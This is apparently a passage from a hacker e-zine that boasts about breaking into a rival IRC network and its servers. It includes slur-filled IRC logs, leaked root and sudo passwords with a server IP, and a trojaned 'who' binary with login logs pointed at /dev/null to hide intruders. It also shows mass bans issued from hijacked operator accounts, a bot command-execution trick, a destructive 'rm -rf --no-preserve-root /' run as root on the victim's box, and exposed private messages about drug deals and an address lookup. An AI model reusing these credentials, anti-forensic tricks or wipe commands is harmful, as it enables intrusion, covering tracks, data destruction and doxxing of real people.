█ <~bongrip> you dont have the first clue as to what you should have put in
|
|
█ <~bongrip> tell me
|
|
█ <~bongrip> give me the cmd
|
|
█ <~MLT> do u not have some antifa demonstrations to be attending
|
|
█ <~MLT> or furry meetups
|
|
█ <~bongrip> .!raw what
|
|
█ <~bongrip> show me
|
|
█ <~bongrip> rn
|
|
█ <~bongrip> mr hacker
|
|
█ <~syn4pse> ^^
|
|
█ <~bongrip> ill paste it correctly after you fuck it up
|
|
█ <~bongrip> noob
|
|
█ <~MLT> <+ghost> ok just let us know the uname -a when you're done so we can
|
|
█ tailor the payload for the next link we send you
|
|
█ <~MLT> >>>>> impyling you have grsec bypass
|
|
█ <~MLT> lol
|
|
█ <+ghost> how about !raw run cmd.exe deltree C:\ # fuq1ng wind0ws
|
|
█ <~bongrip> that wont work bb
|
|
█ <~bongrip> i can actually run that for you rn
|
|
█ <~bongrip> and dank wont move a muscle
|
|
█ <~bongrip> youll see the reply
|
|
█ <~bongrip> want me to tell you why?
|
|
█ * syn4pse waits for dank to quit
|
|
█ <~bongrip> you're a dumbfuck?
|
|
█ <~bongrip> lol
|
|
█ <+ghost> i don't because we never wanted some garbage RDP to begin with
|
|
█ <~bongrip> you could have actually done something
|
|
█ <~MLT> you wanted access to our ircd
|
|
█ <+ghost> what would we gain?
|
|
█ <+ghost> your MIRC license?
|
|
█ <~MLT> which u failed to obtain
|
|
█ <~bongrip> the keys to this entire kingdom
|
|
█ <~bongrip> all the ip's
|
|
█ <~bongrip> pop shit
|
|
█ <~bongrip> ddos us
|
|
█ <~bongrip> make us dump
|
|
█ <~bongrip> pop tcpdump
|
|
█ <~bongrip> snort
|
|
█ <~bongrip> do some thing
|
|
█ <~bongrip> pop sshd
|
|
█ <~bongrip> be smart
|
|
█ <~bongrip> not a dumb fag
|
|
█ <@Southern_B|tch> 0.o
|
|
█ <~bongrip> dont come back here after you make mistakes
|
|
█ <+ghost> ip addresses? like the ones you were logging in #priv8, an open cha
|
|
█ nnel that was not even +s?
|
|
█ <~bongrip> and say 'oh we still got you haha'
|
|
█ <~bongrip> tell me what my ip is to my hub
|
|
█ <+ghost> you think we don't know the hub ip?
|
|
█ <~bongrip> what is it
|
|
█ <~syn4pse> no
|
|
█ <+ghost> what server am i connected to?
|
|
█ <~syn4pse> dont tell it i dont want to have to change it
|
|
█ <+ghost> tell me, bongrip
|
|
█ <~bongrip> lol at least you got some info passed down to u
|
|
█ <~bongrip> thats good
|
|
█ <~bongrip> same pw i had since el8
|
|
█ <~bongrip> err
|
|
█ <~bongrip> domain*
|
|
█ <~bongrip> only gave one person that, p funny
|
|
█ <~bongrip> but that person proved to open their mouth about a bunch of thing
|
|
█ s
|
|
█ <~bongrip> which im gonna end up dropping info too, and im pretty sure peopl
|
|
█ e won't like it including you
|
|
█ <+ghost> which password?
|
|
█ <+ghost> the one you sent us yesterday?
|
|
█ <~MLT> rofl told u
|
|
█ <~MLT> @ bongrip
|
|
█ <~MLT> who's "us"
|
|
█ <~MLT> would that be zf0??
|
|
█ <~MLT> professional blackhat hacker extraordinaires
|
|
█ <+ghost> <bongrip-> IDENTIFY fuckyehbr0
|
|
█ bongrip [rip@undernix.net] has quit [NickServ (GHOST command used by scope)]
|
|
█ bongrip [rip@A5CC1D30:CAE4151D:95D19DA1:IP] has joined #insecurity
|
|
█ * mode/#insecurity [+v bongrip] by danK
|
|
█ <~MLT> lol
|
|
█ <+scope> <3
|
|
█ <@Southern_B|tch> Oh
|
|
█ <~MLT> lmao
|
|
█ <+ghost> looks like he still hasn't changed it either, i didn't expect that
|
|
█ <~MLT> where the oper passes at?
|
|
█ <+bongrip> lol
|
|
█ <+bongrip> nice try
|
|
█ <+bongrip> i used msg nickserv too :P
|
|
█ <+bongrip> just dug that out of logs did you
|
|
█ <+bongrip> acting like a hacker again?
|
|
█ <~MLT> I don't even know my nickserv pass atm so id be surprised if
|
|
█ they knew it
|
|
█ <@Southern_B|tch> We suppose to remember them?
|
|
█ * scope [deploy@53ECE845.87245059.98A7DFBF.IP] has quit [Z:lined (lol i knew
|
|
█ ur dumbass was a part of it, slut i know who u are so will everyone else
|
|
█ soon)]
|
|
█ <~MLT> were they even part of it tho
|
|
█ <@Southern_B|tch> 0.o
|
|
█ <~MLT> like tbh i was about to /ns ghost u there
|
|
█ <~MLT> just to see if it worked
|
|
█ <~MLT> lol
|
|
█ <+bongrip> well
|
|
█ <+bongrip> could be
|
|
█ <+bongrip> either way
|
|
█ <+bongrip> lol
|
|
█ <+bongrip> fuck them for trying
|
|
█ <~MLT> we need to stop banning like EVERYONE tho lol
|
|
█ <@Southern_B|tch> I think they just tried it
|
|
█ <+bongrip> right?
|
|
█ <~MLT> i guess
|
|
█ <~MLT> lol
|
|
█ <~MLT> but
|
|
█ <+bongrip> illremove it
|
|
█ <~MLT> i would have done the same
|
|
█ <+bongrip> i did it for fun tho
|
|
█ <~MLT> obv someone was gonna try
|
|
█ <+bongrip> ya
|
|
█ <+bongrip> tru
|
|
█ <+bongrip> but i would expect a ban
|
|
█ <+bongrip> and release
|
|
█ <+bongrip> just the same
|
|
█ <~MLT> so did u message ""nickserv"" too/
|
|
█ <~MLT> lol
|
|
█ <@Southern_B|tch> Banning is p lame
|
|
█ <~MLT> agree
|
|
█ <+bongrip> ya
|
|
█ <+bongrip> perm bans are
|
|
█ <~MLT> unless like cp
|
|
█ <+bongrip> second bans arent
|
|
█ <~MLT> or something
|
|
█ <+bongrip> lol
|
|
█ <@Southern_B|tch> Why ban people who keep room going
|
|
█ <@Southern_B|tch> xD
|
|
█ <+bongrip> making me drop my nick cause this ghost fag likes to save pw's fr
|
|
█ om when i was gone for 2 days and ircd restarted
|
|
█ <+bongrip> theres no hack in that
|
|
█ <+ghost> i agree too
|
|
█ <+bongrip> lol
|
|
█ <@Southern_B|tch> Wb
|
|
█ <+bongrip> what else u got buddy
|
|
█ <+ghost> why don't you stop being l4m3r
|
|
█ <+bongrip> anything
|
|
█ <~MLT> >>typing in leetspeak because I'm a hacker
|
|
█ <~MLT> where are our oper passes??
|
|
█ <~MLT> im srsly disappointed
|
|
█ <~MLT> in u
|
|
█ <~MLT> right now
|
|
█ <+bongrip> ghost
|
|
█ <@Southern_B|tch> Oh
|
|
█ <+bongrip> where are we penetrated
|
|
█ <@Southern_B|tch> Scrolling
|
|
█ <+bongrip> ive looked high and low
|
|
█ * ghost [ghost@15808AD9.9D59F381.148B5546.IP] has quit [Quit: keep guessing]
|
|
█ <@Southern_B|tch> He left
|
|
█ <+bongrip> lol
|
|
█ <&sniger> Lmao
|
|
█ <+dirty> bongrip, inb4 the mail server
|
|
█ <&sniger> Hax af
|
|
█ <+bongrip> i was jk
|
|
█ <~MLT> nothing is owned
|
|
█ <~MLT> lol
|
|
█
|
|
█ <+bongrip> ive looked high and low
|
|
█
|
|
█ He says he keeps eye on servers and knowing they are secure.
|
|
█ We check too.
|
|
█
|
|
█ root@zyzz8:~# cat .bash_history
|
|
█ su (09:06:40) (~chrono_) (23: Result 1: 164.132.228.206 (irc.supernets.org)
|
|
█ <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: Result 1: 16
|
|
█ 4.132.228.206 (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.su
|
|
█ pernets.org) <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23:
|
|
█ Result 1: 164.132.228.20605:-58) 05:-58) 05:-58) 05:-58) 05:-58) 05:-58)
|
|
█ (09:06:41) (~chrono_) (irc.supernets.org) <<< (23: Result 1: 164.132.228.206
|
|
█ (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) <
|
|
█ << (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: Result 1: 164
|
|
█ .132.228.206 (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.sup
|
|
█ ernets.org) <<< (23: Result 1:05:-58) 05:-58) 05:-58) 05:-58) 05:-58) 05:-58
|
|
█ )
|
|
█ who
|
|
█ whoami
|
|
█ ls
|
|
█ ls -lah
|
|
█ cd /home/
|
|
█ ls
|
|
█ ps aux
|
|
█ apt-get install build-essential
|
|
█ apt-get install upgrade
|
|
█ apt-get install update
|
|
█ apt-get install update
|
|
█ apt-get install upgrade
|
|
█ apt-get update
|
|
█ apt-get upgrade
|
|
█ apt-get install build-essential
|
|
█ apt-get install libssl-dev
|
|
█ apt-get install fail2ban
|
|
█ apt-get install psad
|
|
█ adduser ins3circd
|
|
█ nano /etc/sudoers
|
|
█ apt-get install nano
|
|
█ apt-get install sudo
|
|
█ nano /etc/sudoers
|
|
█ su ins3circd
|
|
█ su ins3circd
|
|
█ su ins3circd
|
|
█ cd /home/ins3circd
|
|
█ ls
|
|
█ ls -lah
|
|
█ rm -rf .bashrc
|
|
█ cp .bashrc2 .bashrc
|
|
█ su ins3circd
|
|
█ su ins3circd
|
|
█ su ins3circd
|
|
█ su ins3circd
|
|
█ ls
|
|
█ who
|
|
█ ls -lah
|
|
█ cd /home/
|
|
█ ls
|
|
█ cd ins3circd
|
|
█ ls
|
|
█ ps aux
|
|
█ netstat -an
|
|
█ who
|
|
█ ps aux
|
|
█ kill -9 22694
|
|
█ su ins3circd
|
|
█ cd ins3circd
|
|
█ cd /home/
|
|
█ cd ins3circd/
|
|
█ nano unrealircd.conf
|
|
█ cd Unreal*
|
|
█ sudo nano unrealircd.conf
|
|
█ ./unreal rehash
|
|
█ cat /etc/shadow
|
|
█ cd /var/
|
|
█ ls
|
|
█ cd log
|
|
█ ls
|
|
█ cat messages
|
|
█ cat faillog
|
|
█ cat syslog
|
|
█ ls -lah
|
|
█ cd ~
|
|
█ ls
|
|
█ ls -lah
|
|
█ cat .bash_history
|
|
█ apt-get update
|
|
█ apt-get upgrade
|
|
█ cd /home/ins3circd/
|
|
█ nano unrealircd.conf
|
|
█ cd Unreal*
|
|
█ sudo nano unrealircd.conf
|
|
█ ./unreal rehash
|
|
█ exit
|
|
█ su ins3circd
|
|
█ exit
|
|
█ cd /home/ins3circd
|
|
█ cd Unreal*
|
|
█ sudo nano unrealircd.conf
|
|
█ ./unreal rehash
|
|
█ cd /home/ins3circd/Unreal3.2.10.1/
|
|
█ sudo nano unrealircd.conf
|
|
█ ./unreal rehash
|
|
█ sudo nano unrealircd.conf
|
|
█ ./unreal rehash
|
|
█
|
|
█ Lazy strategy: replace /usr/bin/who and log in at different times
|
|
█
|
|
█ root@zyzz8:~# cat /usr/bin/who
|
|
█ #!/bin/bash
|
|
█ echo -e "$USER\t`tty|sed s/'\/dev\/'//`\t`date +'%F %H:%M'`\t`echo $SSH_CLIE
|
|
█ NT | awk '{ print $1}'`"
|
|
█ root@zyzz8:~# ls -al /var/log/[wb]tmp
|
|
█ lrwxrwxrwx 1 root root 9 May 27 19:20 /var/log/btmp -> /dev/null
|
|
█ lrwxrwxrwx 1 root root 9 May 27 08:07 /var/log/wtmp -> /dev/null
|
|
█ root@zyzz8:~# ls -al /var/log/lastlog
|
|
█ lrwxrwxrwx 1 root root 9 May 27 19:22 /var/log/lastlog -> /dev/null
|
|
█
|
|
█ Results: Is super effective, bongrip ran ls in /var/ and did not notice the
|
|
█ symlinks to /dev/null xaxaxaxaxaxa
|
|
█
|
|
█ : APt SUCC3SS :
|
|
█
|
|
█
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
███▓▓▓▒▒▒░░░ 0x06 MD5pedia ███
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█░░
|
|
█░
|
|
█░ We finding another vuln in dank with wiki module. Western children may be
|
|
█ surprised, but anyone can edit Wikipedia entries. So we did.
|
|
█
|
|
█ Sadly they removing dank commands after this. We guessing they tired of
|
|
█ "not getting hacked" over and over again. Goodbye, товарищ.
|
|
█
|
|
█ RIP [zf0]danK
|
|
█ 2014 - 2017
|
|
█
|
|
█ GZLINE MLT 0 :by3
|
|
█ GZLINE bongrip 0 :w3 ruN th1s n0w
|
|
█ bongrip has quit (Z:lined (w3 ruN th1s n0w))
|
|
█ GZLINE syn4pse 0 :srry h4v3 2
|
|
█ syn4pse- has quit (Z:lined (srry h4v3 2))
|
|
█ catsik has quit (Z:lined (surprise))
|
|
█ syn4pse has quit (Z:lined (srry h4v3 2))
|
|
█ loeken has quit (Z:lined (srry h4v3 2))
|
|
█ GZLINE RMS 0 :surprise
|
|
█ RMS has quit (Z:lined (surprise))
|
|
█ GZLINE lola 0 :surprise
|
|
█ lola has quit (Z:lined (surprise))
|
|
█ GZLINE loeken 0 :surprise
|
|
█ GZLINE sxcurity 0 :w3 l0v3 y0u th0ugh
|
|
█ Zodiac has quit (Z:lined (w3 l0v3 y0u th0ugh))
|
|
█ sxcurity has quit (Z:lined (w3 l0v3 y0u th0ugh))
|
|
█ dab has quit (Z:lined (w3 l0v3 y0u th0ugh))
|
|
█ GZLINE FuZi0N 0 :surprise
|
|
█ FuZi0N has quit (Z:lined (surprise))
|
|
█ skooch has quit (Z:lined (surprise))
|
|
█ GZLINE Alyssa 0 :surprise
|
|
█ Alyssa has quit (Z:lined (surprise))
|
|
█ GZLINE komodo 0 :surprise
|
|
█ PRIVMSG ChanServ :AKICK #noc ADD MLT /dev/null
|
|
█ PRIVMSG ChanServ :AKICK #noc ADD *@* /dev/null
|
|
█ PRIVMSG OperServ :SAJOIN swerve #research
|
|
█ PRIVMSG ChanServ :MODE #insecurity LOCK ADD -QC
|
|
█ SAJOIN swerve #research
|
|
█ SAMODE #research +aqo swerve swerve swerve
|
|
█ PRIVMSG ChanServ :ACCESS #insecurity ADD swerve SOP
|
|
█ PRIVMSG ChanServ :ACCESS #research ADD swerve SOP
|
|
█ PRIVMSG HostServ :SET Derp underunix.net
|
|
█ PRIVMSG HostServ :SET swerve underunix.net
|
|
█ GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3
|
|
█ PRIVMSG OperServ :SET SUPERADMIN ON
|
|
█ PRIVMSG OperServ :SEEN CLEAR
|
|
█ PRIVMSG OperServ :SEEN CLEAR 6w
|
|
█ PRIVMSG OperServ :FORBID ADD MLT :skid lord
|
|
█ PRIVMSG OperServ :OPERNEWS ADD WE GOT HACKED AGAIN
|
|
█ PRIVMSG OperServ :GLOBAL g3t r34dy 4 th4 w33klY n3tw0rk m41nt3n4nc3 b1tch3z
|
|
█ TOPIC #insecurity :PSA b0ngr1p 1z 1mmun3 t0 b31ng h4qd
|
|
█ danK has changed the topic to: PSA b0ngr1p 1z 1mmun3 t0 b31ng h4qd
|
|
█ PRIVMSG Global :GLOBAL g3t r34dy 4 th4 w33klY n3tw0rk m41nt3n4nc3 b1tch3z
|
|
█ MODE #insecurity +aqo swerve swerve swerve
|
|
█ danK sets mode +aqo on #insecurity swerve
|
|
█ SAMODE #insecurity +aqo swerve swerve swerve
|
|
█ TOPIC #research :d1d y0u m1ss uS?
|
|
█ GZLINE YogSotho 0 :n0 r3funDz 3vr
|
|
█ YogSotho has quit (Z:lined (n0 r3funDz 3vr))
|
|
█ GZLINE dab 0 :pce
|
|
█ PRIVMSG ChanServ :AKICK #insecurity ADD MLT :w3lc0m3 b4q
|
|
█ PRIVMSG ChanServ :AKICK #insecurity ADD bongrip :w3lc0m3 b4q
|
|
█ PRIVMSG ChanServ :DROP #research #research
|
|
█ PRIVMSG ChanServ :DROP #noc #noc
|
|
█ GZLINE bongrip 0 :w3 ruN th1z n0w, n3v3r c0m3 b4q
|
|
█ PRIVMSG BotServ :BOT ADD MLT ci192 vpn02.fbi.gov :skid lord
|
|
█ PRIVMSG OperServ :NOOP SET superb.underunix.net
|
|
█ PRIVMSG OperServ :NOOP SET aussie.insecurity.zone
|
|
█ PRIVMSG OperServ :NOOP SET fsociety.internetz.me
|
|
█ SAMODE #noc -O
|
|
█ MODE #noc -O
|
|
█ MODE #insecurity +q swerve
|
|
█ GZLINE Jaq4l 0 :by3
|
|
█ GZLINE vein 0 :by3
|
|
█ GZLINE buttes 0 :bye
|
|
█ GZLINE xamfp 0 :bye
|
|
█ GZLINE Southern_B|tch 0 :bye
|
|
█ k has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ russian has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ dezmer has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ sniger has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ bitn3ss has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ kurobeats has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ tranny has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ h has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ FSB has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ xamfp has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ cSmith has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ noproto has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ w0ne has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ thom has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ lilwiz has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ eight_bytes has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ anniesbbs has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ Darkness has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ dickbutt has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ Southern_B|tch has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ Nux has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ Jaq4l has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ Nux_ has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ krazed has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ sipa has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ integrity has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ herpez has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ hipphopp has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ fr0zn has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ ma0u has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ psycho has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ deeboi has quit (superb.undernix.net fsociety.internetz.me)
|
|
█ Conflict has quit (superb.undernix.net fsociety.internetz.me)
|
|
█
|
|
█
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
███▓▓▓▒▒▒░░░ 0x07 Clash of the hashes ███
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█░░
|
|
█░
|
|
█░ We thought we would help American celebrate their independence day with
|
|
█ some fireworks.
|
|
█
|
|
█ <MLT> ok guise
|
|
█ <MLT> i know ive been MIA for weeks
|
|
█ <MLT> but im gonna make this IRC active as fuck over the course of the next
|
|
█ few days
|
|
█ <FuZi0N> haha wb!
|
|
█ <MLT> first off im gonna be expunging some skiddies from our group
|
|
█ <MLT> but ill get to that l8r :P
|
|
█
|
|
█ No, let's get to that now.
|
|
█
|
|
█ <jiaolong> gb: i am the official root
|
|
█ <jiaolong> bongrip knowing who i am
|
|
█ <gb> you mean like that bitch from person of interest?
|
|
█ <jiaolong> bongrip: is gangster4lyf still being your sudoer password on 139.
|
|
█ 99.139.120? and h3ll0p00p6654 your root password? i'm thinking not anymore
|
|
█ * bongrip (Z:lined (no reason))
|
|
█ * MLT (Z:lined (no reason))
|
|
█ * syn4pse (Z:lined (no reason))
|
|
█ * syn4pse- (Z:lined (no reason))
|
|
█ * loeken (Z:lined (no reason))
|
|
█ * green (root@undernix.net) has joined #insecurity
|
|
█ * mode/#insecurity [+q green] by green
|
|
█ * FuZi0N (Z:lined (no reason))
|
|
█ * bongrip_ (Z:lined (no reason))
|
|
█ * sxcurity (Z:lined (no reason))
|
|
█ * Zodiac (Z:lined (no reason))
|
|
█ * dab (Z:lined (no reason))
|
|
█ * mode/#insecurity [+o danK] by spooky_
|
|
█ <MLGBT> i came i saw i conquered. fuck being second. i must dominate in
|
|
█ every thing i do.
|
|
█ * cSmith (Z:lined (no reason))
|
|
█ * Nux (Z:lined (no reason))
|
|
█ <jiaolong> MLGBT: and i just came
|
|
█ * Darkness (Z:lined (no reason))
|
|
█ * icyphox (Z:lined (no reason))
|
|
█ * h (Z:lined (no reason)])
|
|
█ * dickbutt (Z:lined (no reason))
|
|
█ * mode/#insecurity [+l 47] by danK
|
|
█ * lilwiz (Z:lined (no reason))
|
|
█ * thom (Z:lined (no reason))
|
|
█ <jiaolong> RIP
|
|
█ <MLGBT> my message is to hack hard, dont be a sad cunt, enjoy life and dont
|
|
█ take urself 2 seriously.
|
|
█ * w0ne (Z:lined (no reason))
|
|
█ * RMS (Z:lined (no reason))
|
|
█ * mode/#insecurity [+l 43] by danK
|
|
█ * green has changed the topic to: APT
|
|
█ * M (3e1fc5bb@boats-16B440C8.mibbit.com) has joined
|
|
█ * M has quit (Z:lined (no reason))
|
|
█ * herpez has quit (Z:lined (no reason))
|
|
█ * dopE- has quit (Z:lined (no reason))
|
|
█ * didi_ has quit (Z:lined (no reason))
|
|
█ * smurgle has quit (Z:lined (no reason))
|
|
█ * FlappyCuck has quit (Z:lined (no reason))
|
|
█ * n0rdi has quit (Z:lined (no reason))
|
|
█ * noproto has quit (Z:lined (no reason))
|
|
█ * noproto_ has quit (Z:lined (no reason))
|
|
█ <jiaolong> yes hello, i being oper too now
|
|
█ * danK sets channel limit to 35
|
|
█ * kla has quit (Z:lined (no reason))
|
|
█ * spooky_ gives channel operator status to spooky_
|
|
█ * installgen2 has quit (Z:lined (no reason))
|
|
█ * psycho has quit (Z:lined (no reason))
|
|
█ * vein has quit (Z:lined (no reason))
|
|
█ * skooch has quit (Z:lined (no reason))
|
|
█ * Alyssa has quit (Z:lined (no reason))
|
|
█ * anniesbbs has quit (Z:lined (no reason))
|
|
█ * M (3e1fc5bb@boats-5AD9868F.mibbit.com) has joined
|
|
█ * MLGBT gives channel half-operator status to MLGBT
|
|
█ * FSB has quit (Z:lined (no reason))
|
|
█ * rek has quit (Z:lined (no reason))
|
|
█ * M has quit (Z:lined (no reason))
|
|
█ * danK sets channel limit to 26
|
|
█ * MLGBT sets mode +q on #insecurity MLGBT
|
|
█ * sipa has quit (Z:lined (no reason))
|
|
█ * tranny has quit (Z:lined (no reason))
|
|
█ * danK sets channel limit to 24
|
|
█ * kurobeats has quit (Z:lined (no reason))
|
|
█ * danK sets channel limit to 23
|
|
█ * jiaolong sets mode +q on #insecurity jiaolong
|
|
█ * hipphopp has quit (Z:lined (no reason))
|
|
█ * danK sets channel limit to 22
|
|
█ * Southern_B|tch has quit (Z:lined (no reason))
|
|
█ * Atomic_SA284 has quit (Z:lined (no reason))
|
|
█ * xamfp_ has quit (Z:lined (no reason))
|
|
█ * Jaq4l has quit (Z:lined (no reason))
|
|
█ * krazed has quit (Z:lined (no reason))
|
|
█ * eight_bytes has quit (Z:lined (no reason))
|
|
█ * fatnigger1488 has quit (Z:lined (no reason))
|
|
█ * sniger has quit (Z:lined (no reason))
|
|
█ ChanServ has quit (superb.undernix.net services.undernix.net)
|
|
█
|
|
█ <bongrip> !raw timer1 0 1 speak i got rooted
|
|
█ <danK> result: <empty string>- duration: 0 ms
|
|
█
|
|
█ <bongrip> !raw timer 99999 1 exec calc.exe
|
|
█ danK has quit (Connection reset by peer)
|
|
█
|
|
█
|
|
█
|
|
█ .''.
|
|
█ .''. *''* :_\/_: .
|
|
█ :_\/_: . .:.*_\/_* : /\ : .'.:.'.
|
|
█ .''.: /\ : _\(/_ ':'* /\ * : '..'. -=:o:=-
|
|
█ :_\/_:'.:::. /)\*''* .|.* '.\'/.'_\(/_'.':'.'
|
|
█ : /\ : ::::: '*_\/_* | | -= o =- /)\ ' *
|
|
█ '..' ':::' * /\ * |'| .'/.\'. '._____
|
|
█ * __*..* | | : |. |' .---"|
|
|
█ _* .-' '-. | | .--'| || | _| |
|
|
█ .-'| _.| | || '-__ | | | || |
|
|
█ |' | |. | || | | | | || |
|
|
█ ___| '-' ' "" '-' '-.' '` |____
|
|
█ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
█
|
|
█ ssh ins3circd@139.99.139.120
|
|
█ ins3circd@139.99.139.120's password:
|
|
█
|
|
█ Linux zyzz8 4.4.59-1-pve #1 SMP PVE 4.4.59-87 (Tue, 25 Apr 2017 09:01:58 +02
|
|
█ 00) x86_64
|
|
█
|
|
█ The programs included with the Debian GNU/Linux system are free software;
|
|
█ the exact distribution terms for each program are described in the
|
|
█ individual files in /usr/share/doc/*/copyright.
|
|
█
|
|
█ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
|
|
█ permitted by applicable law.
|
|
█ ins3circd@zyzz8:~$ sudo su
|
|
█ [sudo] password for ins3circd:
|
|
█ root@zyzz8:/home/ins3circd# rm -rf --no-preserve-root /
|
|
█ [1] 21641
|
|
█ rm: cannot remove '/run/shm': Device or resource busy
|
|
█ rm: cannot remove '/run/lock': Device or resource busy
|
|
█ rm: cannot remove '/dev/tty2': Device or resource busy
|
|
█ rm: cannot remove '/dev/tty1': Device or resource busy
|
|
█ rm: cannot remove '/dev/zero': Device or resource busy
|
|
█ rm: cannot remove '/dev/urandom': Device or resource busy
|
|
█ rm: cannot remove '/dev/tty': Device or resource busy
|
|
█ rm: cannot remove '/dev/random': Device or resource busy
|
|
█ rm: cannot remove '/dev/null': Device or resource busy
|
|
█ (..)
|
|
█
|
|
█ <MLT> so yeah uh
|
|
█ <MLT> I need oper on this box
|
|
█ <MLT> i also need to speak to lola and ask why the FUCK he wasn't using
|
|
█ cert-based auth for ssh
|
|
█
|
|
█
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
███▓▓▓▒▒▒░░░ 0x08 Recommended reading ███
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█░░
|
|
█░
|
|
█░ MLT reassures us MD5 1z CrYpt0grAph1caLLY s3CuR3:
|
|
█
|
|
█ @ret2libc: Well, generally its an issue of speed (making GPU cracking
|
|
█ highly effective) rather than an issue w/ MD5 being crypto-
|
|
█ graphically unsound
|
|
█
|
|
█ >>> from hashlib import md5, sha256
|
|
█ >>> md5("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a\
|
|
█ 3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d8\
|
|
█ 49676da0d1555d8360fb5f07fea2".decode("hex")).hexdigest() ==
|
|
█ md5("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a\
|
|
█ 3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d8\
|
|
█ 49676da0d1d55d8360fb5f07fea2".decode("hex")).hexdigest()
|
|
█ True
|
|
█ >>> sha256("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74\
|
|
█ a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593\
|
|
█ d849676da0d1555d8360fb5f07fea2".decode("hex")).hexdigest() ==
|
|
█ sha256("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74\
|
|
█ a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593\
|
|
█ d849676da0d1d55d8360fb5f07fea2".decode("hex")).hexdigest()
|
|
█ False
|
|
█
|
|
█
|
|
█ MLT PRIVMSG sn :yo
|
|
█ MLT PRIVMSG sn :lemme know when u around
|
|
█ MLT PRIVMSG sn :i need some UK CACI lookups asap
|
|
█ MLT PRIVMSG sn :drug deal irl turned sour
|
|
█ MLT PRIVMSG sn :so i threatened them now they're turning up at my house w/
|
|
█ a bunch of people
|
|
█ MLT PRIVMSG sn :so needing their addresses asap
|
|
█ MLT PRIVMSG sn :fuckers stole £1k worth of coke from me
|
|
█ MLT PRIVMSG sn :drove away without paying so i was hanging onto his car
|
|
█ door punching him in the face while he was speeding up lol
|
|
█
|
|
█ bongrip PRIVMSG MLT :we have a mammoth after us
|
|
█ bongrip PRIVMSG MLT :someone hired
|
|
█ bongrip PRIVMSG MLT :someone bigtime
|
|
█ bongrip PRIVMSG MLT :to hack us
|
|
█ bongrip PRIVMSG MLT :like someone above el8's head
|
|
█ bongrip PRIVMSG MLT :above green
|
|
█ bongrip PRIVMSG MLT :etc
|
|
█ bongrip PRIVMSG MLT :i dont even know the guys name cause he aliases so
|
|
█ much
|
|
█
|
|
█ Actually, we taking this job for free. Is a public service.
|
|
█
|
|
█ MLT PRIVMSG bongrip :then who
|
|
█ bongrip PRIVMSG MLT :positive
|
|
█ bongrip PRIVMSG MLT :he said hes better than green
|
|
█ bongrip PRIVMSG MLT :and knows assembly and other shit
|
|
█ MLT PRIVMSG bongrip :does he have an alias?
|
|
█ bongrip PRIVMSG MLT :he has tons of aliases
|
|
█ bongrip PRIVMSG MLT :hes a ghost
|
|
█ bongrip PRIVMSG MLT :hes just an undergrounder
|
|
█ MLT PRIVMSG bongrip :no common or frequent ones?
|
|
█ bongrip PRIVMSG MLT :everyone knows who he is
|
|
█ bongrip PRIVMSG MLT :but dont really know what to calll him
|
|
█ bongrip PRIVMSG MLT :cause hes got a new nick
|
|
█ bongrip PRIVMSG MLT :all the time
|
|
█ bongrip PRIVMSG MLT :i think hes talking about
|
|
█ bongrip PRIVMSG MLT :the official
|
|
█ bongrip PRIVMSG MLT :root
|
|
█ bongrip PRIVMSG MLT :like the one they allll call
|
|
█ bongrip PRIVMSG MLT :root
|
|
█ bongrip PRIVMSG MLT :el8 there was this guy they called root
|
|
█ bongrip PRIVMSG MLT :that was above all of them
|
|
█ MLT PRIVMSG bongrip :ah
|
|
█ bongrip PRIVMSG MLT :and wasnt el8
|
|
█ bongrip PRIVMSG MLT :he was for hire
|
|
█ bongrip PRIVMSG MLT :so someone apparently has gotten this guy
|
|
█ bongrip PRIVMSG MLT :some money
|
|
